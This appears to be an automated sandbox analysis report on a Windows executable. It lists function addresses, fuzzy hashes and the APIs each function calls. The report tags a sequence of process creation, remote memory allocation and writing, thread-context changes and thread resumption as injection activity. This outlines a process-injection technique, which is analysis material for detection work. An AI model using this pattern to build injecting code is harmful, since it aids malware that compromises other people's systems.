MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: GiG35Rwmz6.exe PID: 6564 Parent PID: 5780 GiG35Rwmz6.exeCOMMON

Executed Functions

Function 00C81781, Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

t9Y, xrefs: 00C81919

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID: t9Y
API String ID: 0-525461791
Opcode ID: e3f1b2a476102eaadbce114c9ded0caa031837af6bf684cad777b22a6104f5c4
Instruction ID: 0d4e1a49c76b7d400e995f137749a0e5a2ba4e21a67930d4150c85831cdd45fe
Opcode Fuzzy Hash: e3f1b2a476102eaadbce114c9ded0caa031837af6bf684cad777b22a6104f5c4
Instruction Fuzzy Hash: 8D511E74E0421A8FDB08DFAAC8506AEFBF2FF89304F18C06AD519A7254D7349A42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C81790, Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

t9Y, xrefs: 00C81919

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID: t9Y
API String ID: 0-525461791
Opcode ID: 42f79dec91f5d1797eef1c2a64b541b8b86c064a89feb021f5feaed62eb3d62a
Instruction ID: 98b5c88e1363f9c8bbd2d500c211e6e3fb5103287a3293fd786f7a989b0fb410
Opcode Fuzzy Hash: 42f79dec91f5d1797eef1c2a64b541b8b86c064a89feb021f5feaed62eb3d62a
Instruction Fuzzy Hash: D6512B74E0421A8FDB08DFAAC4506AEFBF2FF88304F18C06AD519A7254D7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09F3D288, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4c3ff6effd3ca5e3b3549c85bf0f8c816b36f658442f79085020290ba95236
Instruction ID: 4d33ee9a52e9d87299a104c819f6665574e42679a0cc10a390dd449672096fcc
Opcode Fuzzy Hash: ea4c3ff6effd3ca5e3b3549c85bf0f8c816b36f658442f79085020290ba95236
Instruction Fuzzy Hash: 89D1AFB1B016049FDB25DF75C460BAEB7F6AF88604F64C429D149DB6D0CB39E901CB62

Uniqueness

Uniqueness Score: -1.00%

Function 09F39840, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca00044ccd5f2f1e88b9bef6354624aaae8225b2038b015dedb7d6428196e49a
Instruction ID: fa0615e5cc5c836f37821e2f201f70204291ac53f0abfd061192ae4d8948af12
Opcode Fuzzy Hash: ca00044ccd5f2f1e88b9bef6354624aaae8225b2038b015dedb7d6428196e49a
Instruction Fuzzy Hash: 7CB12375E06209DFDB04CFA9D8819EEBBF2AB89340F60D06AD405BB354D7B89A41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00C80F48, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd57b338ccdf81061ca6985cf4915cce1bf69f872c81d1bc7833535bbbbed45
Instruction ID: 72c85f1d9cc3da6714a6ba1f3d3ae8164ad338ed3b13fad01e842e743f11e9c8
Opcode Fuzzy Hash: 9cd57b338ccdf81061ca6985cf4915cce1bf69f872c81d1bc7833535bbbbed45
Instruction Fuzzy Hash: F8A13678E0420C8FEB06DFA9C950A9DFBF2AB89304F54C16AD895AB364D7349D42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C80FF0, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1e3df0733fcce73192aa4a4a858f8a3db05bb4eb411122faa008c33276b7bf
Instruction ID: 2b0cf4eb0527bc67ed32cf0fd251a83bd468e8ed1e8258dd540491d317a32ebb
Opcode Fuzzy Hash: ac1e3df0733fcce73192aa4a4a858f8a3db05bb4eb411122faa008c33276b7bf
Instruction Fuzzy Hash: 4481D474E042188FDB08DFEAC884ADEBBF6BF88300F24852AD919AB254D7345942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 09F39E14, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6cf7f07eaece3ceabd2ba147dd0bda38fc67519fbc4ebbc36504e77678da2be
Instruction ID: c4db04a2f709490fec05e228b0c1554866d12495e2612927108ef1b1936fff1c
Opcode Fuzzy Hash: a6cf7f07eaece3ceabd2ba147dd0bda38fc67519fbc4ebbc36504e77678da2be
Instruction Fuzzy Hash: 30510875E1062ACFDB24CF65C98479DF7B2BB89301F14C6EAD409A6600E7749AC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C85770, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62121959d8f284ce361db24fbde7461d119569aa31ec56785f0d76f6528c7729
Instruction ID: ea9a62c75e171c548cfcdb232e7ca89daa479d8fca8d27f01ea95ebc9d5aa876
Opcode Fuzzy Hash: 62121959d8f284ce361db24fbde7461d119569aa31ec56785f0d76f6528c7729
Instruction Fuzzy Hash: F0414F71E056588BDB58DF6B8D4469DFBF3BFC9304F14C1BA950CA6254EB300A868F15

Uniqueness

Uniqueness Score: -1.00%

Function 00C85760, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4568cdb7f63e395cac9c5beb6851b7a7825e8064c6de9ed7431909afdaf91d8
Instruction ID: f962ae232485c36aef0262d44945e70df9218676396c3c2ef2746c47ac1d8a1e
Opcode Fuzzy Hash: f4568cdb7f63e395cac9c5beb6851b7a7825e8064c6de9ed7431909afdaf91d8
Instruction Fuzzy Hash: 55413F71E116598BEB58CF6B8D4478EFAF3BFC9300F14C1BA950CAA264DB3049868F15

Uniqueness

Uniqueness Score: -1.00%

Function 00C8E7B8, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b441f7c185647a85c8344a2c6b25578661924a5a3dde05eef4571c4fbe12eb7
Instruction ID: 47316c42b54711bed00383d5874f079c418f5291f266a37fda3666924877b7bf
Opcode Fuzzy Hash: 3b441f7c185647a85c8344a2c6b25578661924a5a3dde05eef4571c4fbe12eb7
Instruction Fuzzy Hash: 0F212C34F19209EBC748DFB5D9845AEFBB2EBC9305F24D4A6D006A7254DA349A01DB18

Uniqueness

Uniqueness Score: -1.00%

Function 09F309A0, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac4ee0a8ed6c83bb698ddab1f0be1bd4eb99b52a107b5aa3881dc20fc45e383
Instruction ID: 6f072d0b72fa16ee171532c08700a822a3c957a3e54faefee3be98a46d5ea4cd
Opcode Fuzzy Hash: cac4ee0a8ed6c83bb698ddab1f0be1bd4eb99b52a107b5aa3881dc20fc45e383
Instruction Fuzzy Hash: E6210C71E056188BEB58CFABD8406DEF7F7BFC8200F04D1B6C508A6264DB3459418F51

Uniqueness

Uniqueness Score: -1.00%

Function 00C82160, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f4de776a2a57e6774c68c529b5dc3822c77b7abcaac59411be35b2e1125728
Instruction ID: 8dae1739285122d239ddf5eaab2ead8591c77c2bbccf1f8e2f3dde3b03789d26
Opcode Fuzzy Hash: e5f4de776a2a57e6774c68c529b5dc3822c77b7abcaac59411be35b2e1125728
Instruction Fuzzy Hash: 3421E471E006188BDB18CFAAD84469EBBB7AFC8311F14C16AD509AA264DB305A56CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C82151, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d9cfca3632d8366e5bad880e4f4bfc1898826fd43d89817c6cd21fccff3d1d
Instruction ID: 80c39fd4b9cc0dcbfa60f369b63d708267b31918eabf7e48981a8471040a8ea0
Opcode Fuzzy Hash: 36d9cfca3632d8366e5bad880e4f4bfc1898826fd43d89817c6cd21fccff3d1d
Instruction Fuzzy Hash: 9B21C6B1E046588BDB19CFAAD84478EBBF3AFC9300F14C16AD408AA264DB745946CF51

Uniqueness

Uniqueness Score: -1.00%

Function 09F3856D, Relevance: 1.8, APIs: 1, Instructions: 328processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F3883F

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0e9d85b02d23f92cff652baef1ce17c0f0cc72c865a574b83015d37bc254349c
Instruction ID: 4c975b7d1799df29407ce9e6a9d980c0191590fb580598a8cbb3fc9ff3b3967d
Opcode Fuzzy Hash: 0e9d85b02d23f92cff652baef1ce17c0f0cc72c865a574b83015d37bc254349c
Instruction Fuzzy Hash: 54C11471D0022D8FDB20CFA4C881BEDBBB1BF49304F0095A9E559B7250DB789A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 09F38578, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09F3883F

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a58049fab8ea80b4f3e7456f9cbbbcabd78460a98f4948b4f5a4033471f81a06
Instruction ID: 19ec05fd9c4afe903d99e41add62598dd95dc13f2a4169958ff5ceee1f4999db
Opcode Fuzzy Hash: a58049fab8ea80b4f3e7456f9cbbbcabd78460a98f4948b4f5a4033471f81a06
Instruction Fuzzy Hash: 3EC11471D0022D8FDB20CFA4C881BEDBBB1BF49304F0095A9E559B7240DB789A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 09F381E9, Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F382C3

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 38e6c2f5a2fcdb489d2368fe8800f32b9337402db073bc8bb3ce45ff5536c2e4
Instruction ID: 0c8e4b58c8ac7d75733b71b95ec19edb23d9ee73e1b01c95d36bc046ee3259ce
Opcode Fuzzy Hash: 38e6c2f5a2fcdb489d2368fe8800f32b9337402db073bc8bb3ce45ff5536c2e4
Instruction Fuzzy Hash: C141ABB5D012589FCF00CFAAD984AEEFBF1BB49314F14942AE815B7240C739AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09F381F0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F382C3

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5f75b204a7701360ef9b3cd1b6e34128aae64ce575074caca75a6b4b1f2beca7
Instruction ID: c66951c2d50365b38d7941b6eb2b5c95c505493027b41074cf077b302afce422
Opcode Fuzzy Hash: 5f75b204a7701360ef9b3cd1b6e34128aae64ce575074caca75a6b4b1f2beca7
Instruction Fuzzy Hash: 3941AAB5D012589FCF00CFAAD984AEEFBF1BB49314F14942AE815B7240D739AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09F38340, Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F383FA

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 87d73dab2a0db56bc6bf573cb8d19cdd61551a21debe755fe09a378cc0e66064
Instruction ID: ec1fcb065d59d2653b93a036757208143fc059fedbffea2c200d2aada5dceef8
Opcode Fuzzy Hash: 87d73dab2a0db56bc6bf573cb8d19cdd61551a21debe755fe09a378cc0e66064
Instruction Fuzzy Hash: 1241C9B5D042589FCF00CFAAD884AEEFBB1BB49310F14942AE914B7240D739A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C8F280, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C8F34B

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f22b2c142a88a6c5dc198fa1c938486de5efd8f323e6441560bd42f5a1375181
Instruction ID: 12eb391c8e80d8910e44cfd915f00ad851a958444150bfdf52886698f45e20e3
Opcode Fuzzy Hash: f22b2c142a88a6c5dc198fa1c938486de5efd8f323e6441560bd42f5a1375181
Instruction Fuzzy Hash: 6B4166B9D002589FCF00CFA9D984ADEBBF5BB19314F14906AE918BB310D335A955CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09F38348, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09F383FA

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0c750fb97276a7c516aee937e082987e7f1347fa9dcf6ef6025d4c2fba5a5ce0
Instruction ID: 865be50dbde1aed1ba10e5ed77b447ab8ce78742152a7df1371e18fd35535bbd
Opcode Fuzzy Hash: 0c750fb97276a7c516aee937e082987e7f1347fa9dcf6ef6025d4c2fba5a5ce0
Instruction Fuzzy Hash: 5141B8B5D042589FCF10CFAAD884AEEFBB1BF49310F14942AE914B7240D739A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09F380C8, Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F3817A

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f79195421cc150ce246c7d949df4bcd096b513aa123708520aacc2fc2abbd69
Instruction ID: fa9e39322de5a70104b4856b35dd585042d5ce68040c9fd01fc4e55d1afa3780
Opcode Fuzzy Hash: 5f79195421cc150ce246c7d949df4bcd096b513aa123708520aacc2fc2abbd69
Instruction Fuzzy Hash: 9731A8B8D04258DFCF10CFA9D884AEEFBB1BB49314F10942AE914B7240D739A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09F380D0, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09F3817A

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: feda1bc997b3584059eacd0fc709316b6e09ddd71bb92aafce86e8453df32d04
Instruction ID: 2872e1190fc36d04a143094fdd2d18284b20a24315e04c447ea0cadd54e9db0c
Opcode Fuzzy Hash: feda1bc997b3584059eacd0fc709316b6e09ddd71bb92aafce86e8453df32d04
Instruction Fuzzy Hash: 1231A6B8D042589FCF10CFA9D880ADEFBB1BB49314F10A42AE914B7240D739A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09F37FA0, Relevance: 1.6, APIs: 1, Instructions: 99threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 09F38057

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 2a8fe9ab7eb8429ba897e07a60979aadda30bfb0bd3d8405152263c7e553eb34
Instruction ID: 5cbc907189a23c55b3e814721e3a21ad89be6dea11295167d086299c1e724ac8
Opcode Fuzzy Hash: 2a8fe9ab7eb8429ba897e07a60979aadda30bfb0bd3d8405152263c7e553eb34
Instruction Fuzzy Hash: 7141BEB5D052589FCB10CFA9D884AEEFBF1BF49314F54842AE415B7240C739A949CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C87F20, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C87FCF

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 30dbbadf9c661830ec3d7aba8205a1974567ac5f54376a8e68eb36770cb7f681
Instruction ID: 6e1eea20aa7f655326a70b435926951d1f036c413580ef1b83e6fc8a5cf8dfc4
Opcode Fuzzy Hash: 30dbbadf9c661830ec3d7aba8205a1974567ac5f54376a8e68eb36770cb7f681
Instruction Fuzzy Hash: 1F3198B9D042589FCF10CFAAD884ADEFBF1BB09314F24902AE814B7250D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09F37FA8, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 09F38057

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: f6a16d4ab242fff68bce004dab1cf119b66beef14efe92c34a95df27186dcf2b
Instruction ID: 48d24f54a3ad8513387645f92e2e6180b16d772e99e66f9398cb92797351d4a0
Opcode Fuzzy Hash: f6a16d4ab242fff68bce004dab1cf119b66beef14efe92c34a95df27186dcf2b
Instruction Fuzzy Hash: 6431CDB5D002589FCB10CFAAD884AEEFBF1BF49314F14802AE414B7240C739A989CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00C87F28, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 00C87FCF

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c713f1db6ec03f4d242521a046f30d1938b505365f3433e01109b255e4f29018
Instruction ID: 26075902b15379912dcf45b6d2513c6c9e1584cf23fdf9a25407de9fc55ee9b2
Opcode Fuzzy Hash: c713f1db6ec03f4d242521a046f30d1938b505365f3433e01109b255e4f29018
Instruction Fuzzy Hash: 603198B9D042589FCF10CFAAD484ADEFBB1BB09314F24902AE814B7250D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09F3B6C0, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09F3B75B

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c6ad7e680fa634e72999643c1041cc72990199cc1058f21c1639de419da1ba98
Instruction ID: e294540570dc4e87fd62cb311a6fcdc32450152ec73c1b952ed5ea6e2af1ddc5
Opcode Fuzzy Hash: c6ad7e680fa634e72999643c1041cc72990199cc1058f21c1639de419da1ba98
Instruction Fuzzy Hash: 1F3166B9D042589FCB10CFA9D584A9EFBF5AB49310F14902AE824B7310D375A9458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 09F37EB0, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09F37F36

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 825a913645eb90cfa7788a2149c642c38eac9e7011f0a66f90d5feed9f038698
Instruction ID: ca3f7882ac520fab23c544942f0b1721f528dbd3c4d861f2fbfd72093aae24ba
Opcode Fuzzy Hash: 825a913645eb90cfa7788a2149c642c38eac9e7011f0a66f90d5feed9f038698
Instruction Fuzzy Hash: D131BAB4D052589FCF10DFAAE484ADEFBB5BB49314F14942AE815B7340C739A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09F37EB8, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09F37F36

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 58747ca37da7f30ed7e165c00ec14e1268dc9ea7f640bb55335d76351ef727f4
Instruction ID: c7587544f52f5713875fe26971e112ed6227272646aabeb63a4b796b158402de
Opcode Fuzzy Hash: 58747ca37da7f30ed7e165c00ec14e1268dc9ea7f640bb55335d76351ef727f4
Instruction Fuzzy Hash: 7731C9B4D012589FCF10DFAAD884A9EFBB5BB49314F14942AE814B7340C739A805CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 09F3D880, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 09F3D8F3

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8fe18e3231092db7c17b4730fa32456d848de3d808b9b40c8b858780443964fd
Instruction ID: 5f0a010dd73b71877426c20e9da7ee0a7f2d4907770e12631c0a74ec484d6886
Opcode Fuzzy Hash: 8fe18e3231092db7c17b4730fa32456d848de3d808b9b40c8b858780443964fd
Instruction Fuzzy Hash: 9731AAB5D00258DFCB10CFA9D484ADEFBF4AB49324F14806AE814B7350D339AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 09F30389, Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

$KU, xrefs: 09F3048C
$KU, xrefs: 09F3046E
$KU, xrefs: 09F30475

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID: $KU$$KU$$KU
API String ID: 0-1845055870
Opcode ID: 232cee3b7bb1e30e4292fbcd5d3f840ce98cb62360389d39cf6a7ba8d729353a
Instruction ID: 2668e761d4387e424d90f1eab10a9ca58dd81121a3fda0a6d483fca089b33324
Opcode Fuzzy Hash: 232cee3b7bb1e30e4292fbcd5d3f840ce98cb62360389d39cf6a7ba8d729353a
Instruction Fuzzy Hash: 4741C4B5D0560ADFCB04CFAAC4805AEFBF2AB89300F64C16AD415B7254D7389A41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 09F30398, Relevance: 3.8, Strings: 3, Instructions: 95COMMON

Download Yara Rule

Strings

$KU, xrefs: 09F3048C
$KU, xrefs: 09F3046E
$KU, xrefs: 09F30475

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID: $KU$$KU$$KU
API String ID: 0-1845055870
Opcode ID: 439f0372355d381862ae95516b2e4fa1f4146de9541ecd1b1fc59f48a8b7ff67
Instruction ID: f88780627440473ebc93a8b4577cc44bea3983b8b07e6ea0cf0a02a8655ceb51
Opcode Fuzzy Hash: 439f0372355d381862ae95516b2e4fa1f4146de9541ecd1b1fc59f48a8b7ff67
Instruction Fuzzy Hash: C041D3B1E0460ADBCB48CFAAC4805AEFBF2AB88300F24D16AD415B7354D7389A41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00C84D69, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

ROQG, xrefs: 00C84F38
?K%, xrefs: 00C84F62

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID: ?K%$ROQG
API String ID: 0-824902036
Opcode ID: a5eb9763b89a8b2c3925d3d473023a1a8098e2df137a9ae925cd9ae9fc8ff3dd
Instruction ID: 9940c4cbe394e4ef76cc03888d2c020ab3e2e426a3588e16cd42a80a6e16bb5d
Opcode Fuzzy Hash: a5eb9763b89a8b2c3925d3d473023a1a8098e2df137a9ae925cd9ae9fc8ff3dd
Instruction Fuzzy Hash: BD5148B0E0420A9FCB08DFA6D5805EEFBF2BF89304F24856AD511A7344D7349A42CF99

Uniqueness

Uniqueness Score: -1.00%

Function 09F35348, Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

'vm, xrefs: 09F3569D

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID: 'vm
API String ID: 0-2756351025
Opcode ID: cd9f7e8e7253ecc3ef5411c52c281bca8974a653f7e8024534163c7d728d2da2
Instruction ID: 8c8990ec415e5bd0c51d5468a54a8cea3d7ef8e8ad879e6ac2623fb0432db9ec
Opcode Fuzzy Hash: cd9f7e8e7253ecc3ef5411c52c281bca8974a653f7e8024534163c7d728d2da2
Instruction Fuzzy Hash: DDC158B1E052198BCB08CFE9C5405DEFBF2BFC8314F54D56AE409AB354D73899018B64

Uniqueness

Uniqueness Score: -1.00%

Function 09F35358, Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

'vm, xrefs: 09F3569D

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID: 'vm
API String ID: 0-2756351025
Opcode ID: 36c30e05cc583f71ce8b6bb6868b00e3de21167faa465ca52accc28d3f57d0c3
Instruction ID: b5b802d4cf915073b3e3e68a3a6cc3f2b60d8c748ff0713faf3c02624fa0840d
Opcode Fuzzy Hash: 36c30e05cc583f71ce8b6bb6868b00e3de21167faa465ca52accc28d3f57d0c3
Instruction Fuzzy Hash: 41B136B1E052598BDB08CFE9C5405DEFBF2BFC8314F68D529E409AB314E73899428B64

Uniqueness

Uniqueness Score: -1.00%

Function 09F373C0, Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21320d20a58084ae0323079563fb05d62cc5aa225479d6fa32974f941377f367
Instruction ID: ec4dda85d2f70a648375074f7b673b5b98c9d7121830aa21e5c3b214a6767c72
Opcode Fuzzy Hash: 21320d20a58084ae0323079563fb05d62cc5aa225479d6fa32974f941377f367
Instruction Fuzzy Hash: 5FE128B4E04219CBCB14DFA9C9809AEFBB2FB89304F24D269D518AB355D734AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F373BD, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

